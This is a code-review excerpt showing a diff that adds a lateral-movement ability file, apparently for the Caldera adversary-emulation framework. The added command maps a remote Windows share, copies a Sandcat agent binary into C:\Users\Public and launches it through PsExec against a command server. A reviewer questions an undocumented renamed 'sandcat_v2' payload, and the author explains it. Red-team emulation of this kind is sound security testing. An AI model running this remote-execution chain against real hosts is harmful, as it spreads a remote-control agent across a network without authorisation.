data/abilities/lateral-movement/620b674a-7655-436c-b645-bc3e8ea51abd.yml

```diff
@@ -0,0 +1,14 @@
+- description: Copy Sandcat file using PsExec on CMD
+  id: 620b674a-7655-436c-b645-bc3e8ea51abd
+  name: Copy Sandcat File using PsExec on CMD
+  platforms:
+    windows:
+      cmd:
+        command: 'net /y use \\#{remote.host.name} & copy /y sandcat_v2.go-windows.exe
+          \\#{remote.host.name}\Users\Public & #{psexec.path} -accepteula \\#{remote.host.name}
+          cmd /c start C:\Users\Public\sandcat_v2.go-windows -server #{server} -v'
+        payload: sandcat_v2.go-windows.exe
```

Comment:
The sandcat_v2.go-windows.exe payload does not exist inside of the sandcat plugin. Where is this coming from? Just based on the naming, what does this binary provide that sandcat.go-windows doesn't?

Reply:
The sandcat_v2.go-windows.exe is the sandcat that is packaged with Caldera. I just downloaded it, renamed it, and reuploaded it as a payload with the version 2. The sandcat payload that is in the payload area is outdated. It would not work when I tried to execute any commands with it.